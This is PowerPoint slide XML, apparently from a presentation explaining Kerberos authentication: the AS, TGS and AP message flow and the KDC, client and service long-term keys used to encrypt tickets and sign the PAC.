          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 31609"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:sysClr val="windowText" lastClr="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34D48594-6975-9B77-0A5E-554F762580AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8093085" y="1570174"/>
            <a:ext cx="1072730"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1. AS-REQ</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24" name="Connector: Curved 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2243C1A-2F3E-936A-51D6-2EE371D096B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="16" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="8710818" y="1800903"/>
            <a:ext cx="876977" cy="698687"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:sysClr val="windowText" lastClr="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BAF425C-E9B8-D4B5-28E7-8C704D8AF7D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8559024" y="2017549"/>
            <a:ext cx="1053494"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2. AS-REP</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26" name="Connector: Curved 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61936558-429F-30C0-F8B6-D6D468C897E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="16" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="9044611" y="2291850"/>
            <a:ext cx="183849" cy="851435"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val -99792"/>
              <a:gd name="adj2" fmla="val 70822"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:sysClr val="windowText" lastClr="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F6633E8-810C-481B-853C-7F5C94102526}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8250984" y="2923166"/>
            <a:ext cx="1200970"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3. TGS-REQ</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28" name="Connector: Curved 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27E2BB16-AA5D-5F32-32A2-EFC3FE0DF2BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="17" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="8971394" y="2807036"/>
            <a:ext cx="902204" cy="754610"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:sysClr val="windowText" lastClr="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="TextBox 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3CF46B7-7E0D-63D7-2141-A1FFC9C744AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9582282" y="3221062"/>
            <a:ext cx="1181734"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4. TGS-REP</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30" name="Connector: Curved 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DADB2BF-CAB6-FE81-658D-54A0E7F89D2E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="17" idx="2"/>
            <a:endCxn id="21" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="8749131" y="3787490"/>
            <a:ext cx="1006922" cy="1123942"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:sysClr val="windowText" lastClr="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="TextBox 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9BEAC90-B914-AB1B-6B9D-2E31B79CE423}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8477950" y="4315485"/>
            <a:ext cx="1072730"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5. AP-REQ</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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="32" name="Group 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50826EF0-22CC-1C07-48E3-81836F390600}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9717218" y="1392107"/>
            <a:ext cx="1093658" cy="1644604"/>
            <a:chOff x="10446699" y="1473785"/>
            <a:chExt cx="1130788" cy="1938154"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="33" name="Picture 2" descr="Server by cyberscooty">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{213565EA-BD48-CC5E-7823-4D9EB10F0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699" y="1473785"/>
              <a:ext cx="737960" cy="122229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9995CD3-D1F4-6217-391E-BB2E47BDC4E9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10623454" y="2902107"/>
              <a:ext cx="807040" cy="509832"/>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KDC</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="35" name="Picture 2" descr="Book by MajinCline">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{534E583C-1323-D440-0ADE-134271339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0449" y="2118230"/>
              <a:ext cx="807038" cy="7622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2751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A3ED-8427-1DDD-FE7F-F87B8D605B1A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Kerberos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="300" noProof="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Authentication: Key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="300" noProof="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0" err="1"/>
              <a:t>ypes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5700B00E-74A9-7CC7-F216-80AAE803551E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="invGray">
          <a:xfrm>
            <a:off x="460262" y="1383986"/>
            <a:ext cx="1458585" cy="1601102"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C00000"/>
          </a:solidFill>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:no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ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2EE592A-C422-45D0-DA9C-4A5CAB77A77B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2068188" y="1383986"/>
            <a:ext cx="9695186" cy="1601102"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E3E1E1"/>
          </a:solidFill>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="135000" rIns="13500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ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>KDC long-term key (derived from "krbtgt" account password)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ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The KDC long-term secret key is the most important key of them all!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1" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Used to </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2000" b="1" i="1" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>encrypt the TGT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2000" b="0" i="1" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2000" b="1" i="1" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>(AS-REP)</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2000" b="0" i="1" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2000" b="1" i="1" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>sign the PAC (AS-REP and TGS-REP)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3563087A-35D7-DB60-97B8-2149FAE9A19A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="invGray">
          <a:xfrm>
            <a:off x="428624" y="3062725"/>
            <a:ext cx="1458585" cy="1601102"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C00000"/>
          </a:solidFill>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:no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ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE5CF3E9-4ECA-2897-F9E9-8CB6647CD1E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2059179" y="3062725"/>
            <a:ext cx="9695186" cy="1601102"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E3E1E1"/>
          </a:solidFill>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="135000" rIns="13500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ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Client long-term key (derived from user account password)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ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The client long-term secret key is based on the computer or user account</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="0" lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2000" b="0" i="1" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Used to </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2000" b="1" i="1" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>check encrypted timestamp (AS-REQ)</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2000" b="0" i="1" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2000" b="1" i="1" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>encrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2000" b="0" i="1" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2000" b="1" i="1" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>session key (AS-REP)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF2D59A8-A538-484B-5834-33573BA27AEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="invGray">
          <a:xfrm>
            <a:off x="428624" y="4741464"/>
            <a:ext cx="1476603" cy="1601103"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C00000"/>
          </a:solidFill>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:no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white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A5D5433-3C99-D8DF-D47B-ADD340BD8F1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2059179" y="4741465"/>
            <a:ext cx="9695186" cy="1601102"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E3E1E1"/>
          </a:solidFill>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="135000" rIns="135000"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ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Target long-term key (derived from service account password)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ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The client long-term secret key is based on the computer or service account</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="0" lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2000" b="0" i="1" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Used to </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2000" b="1" i="1" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>encrypt service portion of the ST (TGS-REP) </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2000" b="0" i="1" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2000" b="1" i="1" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>sign the PAC (TGS-REP)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2000" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 2" descr="Simple gold key by milovanderlinden">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
